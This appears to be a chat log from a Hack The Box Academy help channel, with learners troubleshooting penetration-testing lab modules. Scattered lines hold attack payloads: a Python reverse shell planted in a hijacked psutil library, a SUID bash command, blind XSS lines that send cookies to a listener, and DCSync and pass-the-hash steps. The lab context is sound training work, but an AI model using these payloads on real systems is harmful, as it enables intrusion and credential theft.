#modules
Unless it's http not https you should be able to connect
Are you connected to the vpn?
hi there, anyone who can give me a hint for Hijack Python Lib exercise, please?
cuz I did the step-by-step described in the section, but can't escalate privileges with sudo as described, cuz every time I execute something with sudo I receive this error message: Sorry, user htb-student is not allowed to execute '/usr/bin/python3 ./mem_status.py' as root
pay attention to the directory where the malware was downloaded, you need to be aware of how the infection happened, then you're very close. The answer is case sensitive, this took a few evenings away from me :).
After I noticed a strange thing that gave the correct answer, only then did I get how the infection started
What module is this?
LPE
Can you show the sudo -l output?
```
htb-student@ubuntu:~$ sudo -l
Matching Defaults entries for htb-student on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User htb-student may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/python3 /home/htb-student/mem_status.py
```
sorry I'm not following
Your command is incorrect
You need /home/htb-student/mem_status.py
Not ./mem status
hmm ok., got it, lemme try it
ok., @analog dock this is the output with /home/htb-student/mem_status.py
```
htb-student@ubuntu:~$ sudo PYTHONPATH=/tmp/ /usr/bin/python3 /home/htb-student/mem_status.py
sudo: sorry, you are not allowed to set the following environment variables: PYTHONPATH
htb-student@ubuntu:~$
```
what other stuff?
Pythonpath=tmp???
don't copy and paste commands without understanding them
that's what I'm trying to do, understand why it's not working as explained in the content
You just blindly copied the last command it showed
I understood what did u say....
Did you check your sudo priv?
did you ever figure out why you were being redirected? I am having the same issue right now.
SETENV: understood, thanks
Actually I found it, had to make sure I was using a fresh request rather than the stale one sitting in my repeater.
Magic! It works! for one of the 3 one-liners I tried. Thanks a lot.
Anyone have any tips/tricks on ABUSING HTTP MISCONFIGURATIONS : Advanced Cache Poisoning Techniques in both cases my payloads seem to be escaped have tried different URL parameters and different encoding schemes to try and bypass < > " from being escaped. Appreciate any assistance. 
@long basin dm me.
I have a problem right now on nibblesblog and getting cat to find my reverse shell
in xss blind why doesnt "><script src=http://10.10.14.135:8080/script.js></script> putting in all the input boxes work?
but changing the /script.js to diff ones do?
@analog dock can I DM 2 u?
I've tried both http/s and am connected to the vpn as usual
For what?
for the same exercise, but I'm not finding the right reverse shell syntax to add into the __init__.py
Use backticks `
Can you show me the contents of the mem status script?
And did you follow and understand the section this time? Like finding the right directory you can write in etc
it's a bit long, this is a snippet
```
import os
os.system('import os,pty,socket;s=socket.socket();s.connect(("10.10.15.31",4443));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")')
global _TOTAL_PHYMEM
ret = _psplatform.virtual_memory()
# cached for later use in Process.memory_percent()
_TOTAL_PHYMEM = ret.total
return ret
def swap_memory():
"/usr/local/lib/python3.8/dist-packages/psutil/__init__.py" 2433L, 87886C
```
ok
Try os.system('chmod u+s /bin/bash')
If you did it in the right place and it executes properly, you can just run /bin/bash -p after that
ok., lemme try it
Does hackthebox labs only teaches Pen Testing? I'm currently using the free version and wanted to know if that was the case?
There is also a Blue Team path
Call for help:
I'm in the File Transfers Module, Windows File Transfer Methods.
The question: " Download the file flag.txt from the web root using wget from the Pwnbox. Submit the contents of the file as your answer. "
I'm using "wget http://target_ip/correct/folder/flag.txt" but receive a 404 error on my attack machine. Does anyone know what I'm doing wrong?
In this Windows Privilege Escalation module Credential Hunting https://academy.hackthebox.com/module/67/section/640
||you find the password for the target in file in the htb-student user app data.|| Is that realistic to expect to find credentials for one user in another users C:\Users directory or was the exercise contrived for pedagogical purposes?
Definitely possible credentials can be found anywhere, sometimes there are applications that store secrets for service accounts in plaintext. Especially if its a user that has two accounts on one machine I wouldnt say its too unrealistic.
guys why doesnt new Image().src='http://10.10.14.135:8080/index.php?c='+document.cookie get my index.php on my serv?
You might need to go back and understand what a "webroot" is. Hint it's the base directory
oh i c so its wrong directory///
that doesnt make sense
it cant be wrong directory its just port it serving on
and the file is in the same folder
of the server
```
[Thu Jan 4 15:51:24 2024] PHP 8.2.12 Development Server (http://0.0.0.0:8080) started
[Thu Jan 4 15:51:53 2024] 10.129.50.172:54658 Accepted
[Thu Jan 4 15:51:53 2024] 10.129.50.172:54658 [200]: GET /script.js
[Thu Jan 4 15:51:53 2024] 10.129.50.172:54658 Closing
```
If you're referring to my comment: it wasn't to you
oh i c
Also learn to put stuff in code blocks (```) before and after a block of things, makes it easier to read
try a different payload
no the payload works
NVM, i was being dumb..... again
does burp suite or zaproxy have character count ability for encoder/decoder?
For the 2nd ex of skill assesment in Intro to assembly : do we need to concatenate '/flg.txt' and '\x00' (like the comment say) to add the null byte ? I don't understand where's the problem with my code, it gives me a red prompt without the flag. Thanks
There's intro to assembly module?
yes there is
I realize this is old, but this is the same spot I am stuck on! kirbi2john tickets written: 0
It is driving me nuts
Yo is an experienced software hacker here?
yes dats me im the elite hacker
Did i do something wrong?
hey can you dm me pls?
no
Oh
Just prefacing because 99% of the time it's someone asking for illegal services
Well is remotely controlling a phone using a virtual machine considered as illegal? Even if its your phone?
not the right channel
oh sorry
no problem now get out
which one?
Hence the reading portion of my message
Read #welcome to figure out how to access more of the server
Sorry to text here but is any MOD available to help rn?
about
Verification
Just message one
did 2 but no response
As the message indicates
Then be patient
Also make sure whoever you dm isn't on "busy"
What is the worth thing that you can do if you find an xss vulnerability
what’s that
Hi I am in the attacking common services lab - easy
I found the creds for the smtp server but I cannot login to it
any help on what am I doing wrong?
i tried using plaintext too but the result was same
iirc port 3306 was open on that host
yes I have logged into the service
What is the worst thing that you can do if you find an xss vulnerability
but I was wondering how to login to a smtp service
because I found the creds from there
cant ping target ip
```
ping 10.129.47.70
PING 10.129.47.70 (10.129.47.70) 56(84) bytes of data.
From 10.10.16.1 icmp_seq=1 Destination Host Unreachable
```
this isnt the channel for general questions
are you connected to the academy vpn?
I looked into the sql service but all the tables are empty
I tried to write a file but it did not have privs
how to set up the burp intruder to send 5 requests, wait 30 sec and send 5 requests again
this doesn't work, it sends 1, waits 30 sec and sends 1
I checked again the priv value was null so I wrote a webshell to the xampp home
I got the flag but according to the flag there are 2 ways to get I got it through a webshell created by the mysql service any hints to the other one??
So I did some modules the other day, 5-6 and I tried going back thru them again tonight but without looking at the notes I made, I feel stuck still. Is this normal or am I doing something wrong
Web Proxies, skill assessment, i got the previous question right and believe i have this set up right but i cant seem to generate the correct payload value
prefix is the correct answer from previous question
im on this part of 'getting started' part of the CPTS modules. I seem to not be able to get the service version to pop up , not sure what flags should be run for this particular as ive tried many combos already. keep in mind im new to the field ( about 1 year & 1/2 ) I completed all the 'Starting Point' boxes, so im not sure why i cant seem to get this figured out. any help please
thanks, the question is sorta misleading by asking for a 'service version'.. i probably looked at the answer a thousand times thinking im crazy
and port
Could I get help on the MySQL section in the FOOTPRINTING module?
Stuck on this question: During our penetration test, we found weak credentials "robin:robin". We should try these against the MySQL server. What is the email address of the customer "Otto Lang"?
I know I have to use this
But im unsure of how to form my sentence to get the email of Otto Lang. I'm confident I'm in the right area I just have to write out a string that will pull the name Otto Lang and also the email from both tables.
do you guys think its a good idea to add downloads/desktop to the $PATH
Opinions on the "Stack-based buffer overflows on Windows x86" module?
Is it worth it?
How many total packages are installed on the target system? I used apt list --installed | grep -c “installed” , but it gives me WARNING: apt does not have a stable CLI interface. Use with caution in scripts. 0
How can i solve this question ?
does anyone know how to remove Mobile Guardian
or at least how to acces the admin centre?
It's 100% gold.
how would i go about finding the right exploit to use for this module? After an nmap scan i found that the open services are blackice-icecap/alerts, us-srv, sun-answerbook along with ssh. all using tcp ports. How would I go about finding the correct exploit to exploit the apache druid service on the system?
have you got the service versions already
no
you should do that
the service info provided by nmap without doing actual version scans is just the default common reserved port service. its not necessarily whats actually running
you need service scans/direct interaction to find that part out
Thanks again. Turns out i needed to add an additional parameter to the certipy to make it work. Threw me off because the lesson pracs didnt need it, but I'm guessing the skills assessment environment was different. But a bit of googling and reading the doco on the repo got me there.
Many thanks for the hints/nudges.. I initially had the right idea, but the execution was lacking. Good learning experience none the less. 🙂
I am legit stuck on the most basic beginner problem. I am in Linux Fundamentals and I understand what the questions are asking in theory, but I am stuck not knowing where to go to start looking for the answers. It has a target IP but I am trying to understand where to go to the terminal or shell if I am learning correctly to start using the commands. Any help for the noob is appreciated.
terminal is shell in most instances where you'll see it; a target IP means that from either pwnbox or your own vm that is connected to the vpn you will need to connect TO the target IP via some method (in linux targets usually they'll have you connect via SSH)
@tidal hornet write it in this channel
enumerate service versions and look up vulnerabilities against that version of service youre attempting to exploit, go to CVE data base for exploits
Thank you!!! Now I just have to figure out why my Pwnbox just blinks and doesnt let me type anything lol. Either way I have my heading. Thank you!
"just blinks" are you using the Terminal thing or the actual pwnbox environment, which btw you can fullscreen
The Thingy Labeled "Integrated Terminal" just blinks. When I go to "My Workspace" the VM. It of course looks like a virtual Desktop and I am unsure how to "open" the shell to start typing SSH command
green icon on the top of the screen :)
also since you're a free user: you're limited to one pwnbox spawn per day so don't forget to increase lifetime
the integrated terminal is trash
^
use the pwnbox proper or setup a vm
setting up a vm is gonna benefit you more in the long-run
ahh yes... the ol' follow the cord to the wall equivalent. Welp I solidified my noob status but thank you so much! The journey begins!
Great advice! I will read the FAQs etc to set up a VM
there's actually a whole "Setting Up" module :)
hahaha it gets better.
also most Distros (Distributions) have their own docs for setting up vms
Well I will start there. Thank you! Got too excited about the Linux Penguin and jumped into that as my first true module.
thx
gl hh
🙏
hello, I need help regarding
https://academy.hackthebox.com/module/19/section/103
https://academy.hackthebox.com/module/19/section/119
answer should be {HTB blahblah } right?
you need to evade the firewall; Syn Scans are good at that
you may also need to have the right --source-port
https://help.hackthebox.com/en/articles/5185608-introduction-to-pwnbox also has a section about using the pwnbox UI
Truly Appreciated!!! Thank you!
this is from Network Enumeration with Nmap: any tips on the flags i should use ? ive used a wide range of flag combos , even some complex scans i still cant get the ports to come up
reading is helpful; Firewall IDS/IPS evasion section
what section is this specifically? btw
if it's hard lab then my advice to mcchoi applies to you as well
this one, same like me
https://academy.hackthebox.com/module/19/section/103
"service enumeration"
hard lab yeah?
oh
IIRC this one is just dumb but try adding -sC or --script banner
this is one of the few questions where answering in pwnbox is the way to go
"Same as you" you linked 2 sections here btw
Granted ive done the 'starting point' training labs, completed all the boxes on there before starting these modules
that really means nothing to me tbh
ill go ahead and give it a shot, thank you very much
as those boxes have walkthroughs for you to complete them
so unless you took notes as to what you were doing meh
if i don't finish the modules step by step, can't i get cubes?
a lot of the intro modules you don't get cubes until you finish them
sorry for annoying, but am i wrong? nmap module 103
```
─# ports=$(nmap -p- --min-rate=1000 -T4 10.129.84.52 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sV --script=banner 10.129.84.52
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-04 21:28 EST
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
|_banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_banner: +OK Dovecot ready.
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
| banner: * OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID
|_ENABLE IDLE LOGINDISABLED] Dovecot ready.
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
31337/tcp open Elite?
Service Info: Host: NIX-NMAP-DEFAULT; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.94 seconds
```
in future actually just use the reply feature instead of screenshot
Will do
i mean it's fairly straightforward
select * means select everything
from <table> means from the specific table that has info
where <column> = "string" means where the specific column name matches a string
you'd replace (including the brackets); table, column, and string
try connecting to that one odd service
engage brain and you'll find that sometimes you need to do more: the section even goes over the fact that sometimes NMAP doesn't give all the info @tidal hornet
Gotcha, I kept on replacing the "*" as well
let me give that a shot
unless you know column names, and which columns are important, don't replace the *
Well I do have column names, I just have to grab info from 3 of them
So ill just leave it as is
get the answer first: mess with changing extra parameters after ¯_(ツ)_/¯
ah! i see, forgot about the -Sv parameter for nmap!
np, I honestly don't remember what I used to find group memberships, how did you use certipy to find them? or are you talking about ||-target||?
did you fail at hiding text?
i saw that
formatting is hard 
Hello || I need mental help ||
||I'm a certified moron||
I never knew
|| for spoilers is not standard markdown
totally out of spec
@fathom pendant I dont think im getting my string right
This is what I'm putting down|| select * from myTable where Otta Lang = email ||
incorrect
you need the "Column Name" = "String"
I forgot to add the ";" at the end
even still; that's not correct :)
I also had it like this || select * from myTable where email = Otto Lang; ||
fair, I dont know what email Lang has
But when entering the ID table its just numbers and all blank

Im sorry @fathom pendant I'm letting you down 😦
i wasn't entering an ID table
i was saying from the table select a specific id number as an example
check column names for which column could be the user's name
that's not what i'm referring to
i'm referring to if you just got the first few lines for the column names
I'm sorry its also way past my bed time I got work stupid early forgive me for not functioning properly
what column would correspond to a user's name?
engage that single braincell, i believe in you
|| name ||
WAIT!!! LET ME ATTEMPT IT NOW!
I tried || Select * from myTable where name = Otto Lang; ||
still an L
quotes are important
thanks...
im done for the night
time to retire
Im gonna redo this again tomorrow so I can keep it fresh
I used ||'net' on Dev01 to query DC accounts||, so as you've mentioned, allowed me to identify what other permissions J* had. And also yes for ||-target, ||was thinking I was getting my cert issues knocked back due to rights, googled the error message and the pieces of the puzzle started to come together.
ah okay, yeah you need to use that when the CA is not on DC
i thought the previous lesson pracs also had a separate CA and I was able to somehow trundle through the questions? though the skills assessment env is a little different.
That being said, doing a full blown command with all the params is usually an eventual go-to measure if i've been banging my head against a wall for a while.
I think it did, but yeah glad you were able to figure it out
Server Side Attacks Module
SSRF exploitation
Quick doubt I'm having here: let's say the target app is 10.10.10.10
if the part which deals with the client is running on port 8080, then it'd be on 10.10.10.10:8080, right?
Now, the internal.app.local (local app accessible through SSRF), is it on the same IP, with just a different port? I'm 99% sure it is but it's bugging me.
Am I missing something in the Pivoting, Tunneling, and Port Forwarding module with the RDP and SOCKS Tunneling with SocksOverRDP section? I have followed the instructions but Proxifier is not routing any traffic. I was able to get the flag, just by rdping from the first pivot machine, but obviously that isn't the way we are supposed to do it
i need help at live engagement at module shells & payloads, i'm in SEA so it seems lag af and rdp keep dying
Try using the pwnbox, it has an AU server to work from iirc (turn off your vpn connection on your vm first)
Well, it is possible for it to be as you say, so you're not wrong. The web server configuration might have internal.app.local pointing to another internal port with the same IP.
One other possibility, (which I think is your case) is that it's just another host with a web server serving the web service on the default web ports. So, different IP and default web port.
I am not able to access cheat sheet, can anybody help?
Using an ad-blocker?
Using Brave , yes that might be an issue
brave has native ad-blocker
Thanks,
For AD Enumeration & Attacks - Skills Assessment Part I
I am guessing you use WinRM to connect to MS01? If not do you use SQL?
after using nmap vuln scanner, how would i use the vulnerabilites?
are these vulns not included in metasploit?
some are some arent
sometimes nmap doesn't grab all the info: nmap isn't really a vuln scanner anyway
are you talking about --script vuln? the things that it can detect is very limited, don't rely on it
what should i use for vuln scanning?
your brain mostly
so just search the database for the service name and version?
as a first step yeah
just dont be surprised when its not always that simple
pub exploits in exploitdb/metasploit is just 101 stuff
Why is everyone using chisel for AD Enumeration & Attacks - Skills Assessment Part I
Don't remember learning about that so far...
it's in the pivoting module
you can, or you might need to modify the code, really depends on the situation
Thanks, picked up these courses after six months off so you saved me a ton of searching.
This isn't the place
Definitely wrong place
read #rules before continuing asking for things
and read #welcome
this isn't just some rando hacker server
Did you even try YouTube? Feels like a troll.
Hi, Can anyone help me with this [-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) in impacket-GetUserSPNs.
What is the vital moment when interacting with kerberos
I tried ntupdate with dc-ip It didn't work.
morning!
the ||Gitlab ||instance of the 'Attacking Enterprise Network' is giving me error 500 and is driving me nuts. Any fixes?
apart of resetting the lab all time
Gitlab takes a few minutes to load
ok
the point is it was working, i register an user and it returns error 500 after that
Hello, I'm new here and need help. I'm doing the windows fundamental module.. At first I used to be able to spawn target machines, but I took a break from HTB. I've gotten back and each time I try to spawn a target machine it loads but doesn't spawn, it just reads "click here to spawn machine". I've logged out/in, no change; got a different VPN connection file, no change... Any help?
I'd spoiler/remove things from the Attacking Enterprise Networks module, as most people want to do it blind.
yes i am doing it blind
Yes, I'm saying that others will also want to do it blind, and your message about it contains spoilers.
any help? please
I don't even know how I got here. I had this channel hidden for months now lol
faketime never disappoints
i see you're avoiding losing braincells?
I just got too many pings, and people asking for exam hints, when I posted here regularly. I must have wandered back here when linking someone here from #cpts lol
feel free to link them to me
The cheaters? I have contact with one of the admins for reporting them, but I just got fed up with getting the pings entirely. Was honestly like one person per week.
hi guys i wanna do web exploits and stuff. im good in python and linux. i have $0 to pay for htb. which module should i take?
any of the tier 0 ones, information security fundamentals path
aside from that you're not gonna get far on academy without paying for some content
definitely good to know
if you scroll down on it; it says some of the recommended pre-reqs are Intro to Networking and Linux Fundamentals
if I purchase any monthly subscription and unlock modules , will I be able to access modules after the monthly subscription ends ?
I'm planning to follow the CPTS path.
monthly subscriptions give cubes; any module unlocked with cubes is yours indefinitely
If we go by that logic, using Platinum subscription and buying a voucher would be cheaper than buying Silver annual subscription.
1 mo plat and 1 mo gold (assuming you haven't touched any of the modules already)
the math has indeed, already been done
Thank you for your help. Started last week , and planning to complete the role by August this year.
Hi there
In the shell&payload module, crafting payload with msfvenom section, the author crafted an elf file with msfvenom and somehow transferred it to the victim machine, and then the victim clicked that elf file and it got executed and received the shell
My problem is that when I transferred the elf file(using Python server), it became non-executable, so in order to run it u would need to chmod +x it and then run it, which "wouldn't make sense" in the context of actual phising
So how can it get transferred and executable by default?
i believe when it's created by default it's not executable (but I could be wrong though)
to prevent idiots from accidentally running it on their own system :^)
Yes, I made it executable before starting the server

it might just be the way it was transferred; but also with phishing - people are encouraged to make it executable anyway
i.e. in an email you might write "you'll need to make it executable and run it for us to finish the backup"
I wouldn't expect someone who clicks it to know how to make it executable and vice versa 
i dont have access to the mentioned room.
and i'll try your recommendation and lyk. but why do we need to give a space after the comment tho? how does it make any difference. very dumb question but i just make my foundation strong
i'll try that. thank you : )
I think a more reliable way is to embed the shell in an actual executable and have that running
from the walkthrough, they gave your the sql query
SELECT * FROM users WHERE username= '<injection>' AND password='a'
as I said, -- needs a space afterwards to be recognised as a comment, if the sqli is
SELECT * FROM users WHERE username= 'admin'--' AND password='a'
it wouldn't get recognised as a comment, so you need to add a space. you don't always know what the query is, so it's safer to always add a space or use -- -
read #welcome to find out how to gain access to more of the server
affirmative. i got you. thanks
For the AD Skills Assessment 1 final question is it going to be a PtT maneuver?
I keep thinking these skill assessments will only pertain to topics of the current section. This is not the case I now realize.
thanks, i'll go through it
well skills assessments work to gather your knowledge of the whole module
not just one particular aspect
Yeah but for some reason this AD skills assessment requires a majority of skills from past modules?
Ah, I didn’t think there was any specific order to completing modules. Assumed they were self contained.
if you're doing the CPTS path; it's generally good to do them in order
every module's description contains information about pre-requisites
That’s actually very helpful. I’ll be sure to check that once I finish this one!
while they are self-contained; there's still some level of prior knowledge required to understand and succeed
Yeah I wasted a ton of time trying to use WinRM because it’s heavily referenced in the module but this particular assessment did not require it.
WinRM is just a PS shell wrapper for remoting
(RM standing for Remote Management)
and generally there's more than one way to crack an egg in AD
multiple tools that fulfill the same/better purpose
I believe WinRM would work for the assessment but pivoting and using RDP was a better solution for me personally
Hello, I'm working on the module "Network Enumeration with NMAP". I'm stuck on the hard lab of "Firewall and IDS/IPS evasion". I passed the easy and medium labs, but I don't know how to proceed with this one. Even the hints are not much help. Many thanks
do a full port scan -p-
full port scan and Syn
Ok, ... it took a lot of time, so I canceled it
@fathom pendant & @lusty thicket Many thanks
For me those scans took like 20 minutes
doing a full port scan does generally take a bit of time
Is there something I am missing in "Password attacks" module and in "Password mutation" section: Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer. I created that mutated list and it has about 94k passwords if I brute with hydra it will take around 20 hours. I already did for about 30 mins, but I dont wanna spend a whole day for this exercise
don't attack ssh
Thanks did an nmap scan and found other services too. I will look further into them
also as a protip for this module: save login info you find
Thanks
Which pathways or modules do you guys recommend for someone with basically zero skillset in this region?
Information Security Fundamentals path
Information security foundations?
ye that one
ty
Ill get onto it. Im very new to all of this and am looking to get some knowledge in before commencing actual study
There's a "setting up" module that should help you get a vm set up
hi i'm in intro assembly,
since i use linux aarch64, it can't using cisc
is there any tool that can convert cisc to risc ? 
🔥
🔥
im having a challenge on the module Oracle TNS when i try to install sudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y i get the errors E: Unable to locate package oracle-instantclient-devel
E: Unable to locate package oracle-instantclient-sqlplus . how are people working around this issue?
Hello , I can ask for one question about adcs skills assessment , last question ?
Sure
Hello! i got stuck at this question, i dont know what to do. Its on AD Enumeration & Attacks - Skills Assessment Part I and i should Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01 . Can anyone push me in the right direction? thank you
Anyone
Ive had the same, i couldn’t solve it, so i gave someone in the community the credentials as proof and he gave me the flag 😂
Basically the repo is no longer supporting it in apt or apt-get
Ohh man, ohhh man.
on https://academy.hackthebox.com/module/77/section/853 when i try "sudo monitor.sh" it's asking for a password even though linenum says i should be able to execute as root without pw
Any ideas why I might not have the module for sock proxy in metasploit v.6.3.44-dev. I get this error:
```
> use auxiliary/server/socks_proxy
Loading extension auxiliary/server/socks_proxy...
[-] Failed to load extension: No module of the name auxiliary/server/socks_proxy found
```
The command in sudoers must be the same as you execute ...
I'm still stuck with the hard lab of "Firewall and IDS/IPS Evasion" on https://academy.hackthebox.com/module/19/section/119. Can somebody give me a hint what performance/evasion parameters should be used in order to discover the proper port (the port which "the customer" is talking about - as stated in hint), please?
do a full port scan -p-
I did ... it returned two ports only.
I'm working on pwnbox

LOL ... for me the same 🙂
not sure if its just me but i'm doing the YARA and SIGMA module rn and the rdp connection is so bad that it's unusable 
hello, I have a question about the ESC5 section, can I check with you?
Okay so i managed to run mimikatz, but can't find the User that i am looking for but instead i got some random pw from MS01$, are there any new ideas?
are you at the last question or don't have the user you need?
me?
i am at the last question
do the attack in the second last question then
what do you mean?
Hey, sure 🙂
the attack that's the answer for the second last question, do that, that's how you take over the domain
well i was trying to make dcsync with the last user that i found, but cant find the admin pw
if you did dcsync you'll get the hashes of all users in the domain
yeah i got some ntlm hashes but admin user is not part of that output somehow
also got a very long cleartext pw for MS01$
dcsync wouldn't contain clear text passwords, make sure you're doing the right thing
i use mimikatz lsadump:dcsync
what's the full command?
lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
use the hash you got out of it
the NTLM?
yep, standard pth
can i pth from powershell?
you have mimikatz don't you?
yes
use that
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)
ERROR kuhl_m_sekurlsa_pth_luid ; memory handle is not KULL_M_MEMORY_TYPE_PROCESS
@oblique spoke if you have the t* user you can just use secretsdump to get the admin hash
i have that user
And BAM
with wth user t*?

No, secretsdump with t*, then use admin to winrm
then i need to proxychain the whole shit
Just use ligolo then
ligolo?
Yes, ligolo
never heard of it 😄
I recommend you learn that tool
thank you
Looking for someone who can learn and work on htb stuff together🧐
It’s more chill than having to proxychains everything
You can also use the administrator hash to create a golden ticket with mimikatz then /ptt
you can dm me
@eager badger Sign me up
@eager badger me 2 plz
they've already gotten the hash though
If you have the admin hash just winrm to it 🤷🏼♂️
true, but they asked how to pth in powershell so
there are a lot of ways to do it, winrm, rdp, even smbclient if you just want to access a file
didn't work, but i liked the idea
and whoami still gives t* user
I already set up the ligolo agent for question 4
that was fast as hell
Yeah I did it to rdp to ms01
it's just two commands to set up ligolo
That also works, but it’s slower
Ligolo sets up a tunnel
So quicker to do nmap scans and stuff
And very easy to double pivot
not sure what you're trying to do here, to make a golden ticket you need krbtgt's hash
there's no need for that if you want to get the last flag, just pth in any way and get access to dc, for example sekurlsa::pth
sekurlsa::pth /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\Administrator /ntlm:
sekurlsa didn't work
@oblique spoke just look into ligolo, it’s very easy
im gonna do that thank you
you need elevated priv to pth with mimikatz, if you don't have admin on the current machine then yeah remote pth with ligolo as 0x56 says
or psexec through proxychains
fuck me
i was trying to do it with the user logged in as t*
even tho
😄 this is still not working
^
yeah
In the module Nessus skills assessment, there is a question (2nd): What was the target for the authenticated scan?
What do they mean with target? OS? IP?
Nvm found the answer. It was soo easy that it's kind of stupid.
Hi guys struggling on the Service Scanning module on the last question
List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file.
I'm able to list the SMB shares using the command: smbclient -L //hostname -U bob
but when I try to specifically check into a smb share to find the flag using the following command smbclient //hostname/share -U bob, i get the following exception:
SMB1 disabled -- no workgroup available
question - on the academy dashboard i am only seeing the bug bounty exam voucher...i cannot exchange it for the pentester one...any ideas as to why?
Feel like im missing something easy but in LINUX PRIVILEGE ESCALATION - VULNERABLE SERVICES i copied and saved the example Screen_Exploit_POC.sh and tried to run it with "./Screen_Exploit_POC.sh" and i get the error "-bash: ./Screen_Exploit_POC.sh: Permission denied"
You have to give the script rights to execute
chmod +x
thank you👍
for module 218 (Understanding Log Sources & Investigating with Splunk: https://academy.hackthebox.com/module/218) are the timestamps somewhat fucked or what is going on with splunk here?
01:00:00 != 01:43:26?
guys i tried in the attacking sql model to login but nothing seems to work i run sqsh sqlcmd even mysql nothing works except mssqlclient and i can't run commands or enumerate databases and do select and show databases commands, is there anything I'm doing wrong ?
mssql is not mysql, make sure you're using the right commands for the DB type
just finished AD-Enumeration & Attacks. I feel like I just did a tour in 'Nam
I tried this with proxychains and got access denied.
Guess I’ll try it again…
I just use ligolo🤷🏼♂️
Access denied on what though?
Using the t**** user to attempt secretsdump from Kali machine.
I think I was using the wrong IP
I may have been using the DC01 IP
INLANEFREIGHT/tpetty@172.16.6.3
So you are supposed to use the DC01 IP?
That’s what I used
Guess mine glitched or something. Also Ligolo looks like the exact same thing as Chisel?
Huh they’re using proxychains in the examples for Ligolo. Weird.
yep the goal is the same but you don't have to use proxychains. so stuff like ICMP and standard nmap scans work
INTRO TO WHITEBOX PENTESTING
Command Execution
I am using sed to insert the code into the app.js at line 17.
I am trying to base64 decode the sed within this require('child_process').execSync('bash here')//" and get it to create a new route.
Any alternative ways to do this?
Are you sure about that?
Check quick demo on their GitHub page? Not 100% sure.
This is basically a walkthrough in how to use my favorite tool for lateral movement and network pivoting.
ligolo-ng, not ligolo
If someone here mentions ligolo, they mean ligolo-ng 99.9% of the time
Guess I’ll have to try it if using Chisel didn’t work for me.
Annoying that I was doing the correct workflow and it wasn’t working.
Just follow this guide and you’ll be fine
I highly recommend this guide
https://arth0s.medium.com/ligolo-ng-pivoting-reverse-shells-and-file-transfers-6bfb54593fa5
but switching to ligolo is not likely to fix your problem with dcsync
So it should work using chisel? Not sure why the issue is present then… sounds like I’m using the right commands.
I’ll give it another shot in the next hour and report back.
The correct one, I got that answer I’m on the last one.
Also the guide from @next bronze may be best since it skips building the proxy and server
You can just get the binaries from the GitHub page 🤷🏼♂️
chisel works with dcsync, so that's not likely the issue
Yeah I may have been too sleepy last I tried.
Glad I was on the right track though.
Why there is no output 😄 this thing is getting on my nerves
fuck this shit 😄
use -debug with secretsdump and see what it's doing
+] Exiting NTDSHashes.dump() because rpc_s_access_denied
what
try with '<Domain>/<Username>:<Password>@<dc>'
hi
you probably entered the password wrong then
yes you're doing DCsync
im an idiot but i learned a lot today thank you ❤️
We already told you the ip
can be 😄
Here🙃
im an idiot
guys idk where i should ask this question so i'll do it here pardon me.
whats hackthebox font?
ye
Use dev-tools/inspector
ok tyy
hi everyone i would need some help here. I am at the https://academy.hackthebox.com/module/158/section/1426#questionsDiv section and i have a question about the proxychain.conf file. I am using kali linux, but when i try to run the commands in the module i get this [proxychains] DLL init: proxychains-ng 4.16. Has someone encountered something like this before? i cannot pivot to any machines.
proxychains4.conf
yes sir i tried that instead too still just getting timeouts
Do you have the pivot running the required port to proxy?
can I get a nudge for the initial injection point for SQLMap Skills Assessment?
Or just a hint, been over this site what feels like a million times and can't see it
I.e. do you still have the ssh session running
yes
intercept the request when adding an item to cart
thank you
I did try this before but nothing happened. Now after trying it for 10 times on the same item it finally worked. Thanks
Im losing my mind on AD Enumeration & Attacks - Skills Assessment Part I Q6: Submit this user's cleartext password. I found the user and the hash but I cannot crack it
strange
you don’t need to crack it
I just thought it was intentional, as in only the certain things functioned on the site intentionally as it's just for testing. Turns out just jank
What do I need to do then? Its asking for clear text?
find other ways to dump it?
the users pass has been stored insecurely
😉
ok I found another way to dump and got clear text but there is nothing tying it to the user I found? Is this supposed to just be a pw reuse attempt?
Uh it just says the user and pass afaik
At least with secretsdump
hmm can I dm you and show you how I did it and maybe see how you did it? @analog dock
I just used this
hi there, any hint about how to obtain the shell for the initial access to target machine into LPE Assessment?
so far I had enumerated the server and I found a Tomcat server {/manager & host-manager} are accessible but not common creds are configured, I tried with no success a login enum via MSF module
also, I ran a nmap script scan with no valuable info
common creds got me initial access😉
no way, did u use the HackTricks?
no i did not
ok.
linux priv esc/skills assessment is it possible to get flag5 using tomcat?
dude, I'm using these creds, https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown with no success....
how long ago did u do the assessment? could it be those creds have been changed?
sorry I was asking to Wnted...
same
